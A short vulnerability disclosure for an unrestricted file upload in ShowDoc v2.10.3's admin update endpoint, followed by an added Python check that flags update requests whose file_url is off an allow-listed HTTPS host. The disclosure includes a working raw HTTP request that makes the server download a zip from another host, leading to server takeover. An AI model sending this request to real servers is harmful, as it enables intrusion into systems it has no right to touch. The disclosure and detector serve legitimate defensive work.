There is an Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3.

POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin

new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip

After logging in to the admin panel, an attacker can use this vulnerability to obtain server privileges.
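
A defender-side check for the request shown above, as an added example that is not part of the original report or of ShowDoc's code: it parses a captured HTTP request and flags adminUpdate/download calls whose file_url is not an HTTPS URL on an allow-listed update host. The host `updates.example.com`, the function names and the HTTPS requirement are assumptions of this example.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: placeholder for the only host updates may come from.
TRUSTED_UPDATE_HOSTS = {"updates.example.com"}
# Route from the request on this page, lowercased for a tolerant match.
UPDATE_ROUTE = "/api/adminupdate/download"

# Constructed sample: the page's request reduced to the relevant headers.
FLAGGED = (
    "POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1\r\n"
    "Host: 10.211.55.5\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip"
)
# Constructed sample: same route, file_url on the placeholder trusted host.
ALLOWED = FLAGGED.replace("http://192.168.1.7:88", "https://updates.example.com")


def parse_request(raw):
    """Split a captured HTTP request into (method, target, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    return method, target, body.strip()


def check_update_request(raw):
    """Return findings for an adminUpdate/download request.

    An empty list means the request is not an update download, or its
    file_url is an HTTPS URL on a trusted host.
    """
    method, target, body = parse_request(raw)
    route = parse_qs(urlsplit(target).query).get("s", [""])[0]
    if method != "POST" or route.lower().rstrip("/") != UPDATE_ROUTE:
        return []
    findings = []
    for url in parse_qs(body).get("file_url", []):
        parts = urlsplit(url)
        if parts.scheme != "https":
            findings.append(f"file_url uses scheme {parts.scheme!r}, not https")
        if (parts.hostname or "") not in TRUSTED_UPDATE_HOSTS:
            findings.append(f"file_url host {parts.hostname!r} is not a trusted update host")
    return findings


if __name__ == "__main__":
    for name, req in (("flagged", FLAGGED), ("allowed", ALLOWED)):
        print(name, check_update_request(req))
```

The same allow-list comparison applies server-side before the update archive is fetched; here it runs over traffic captured at a proxy or WAF.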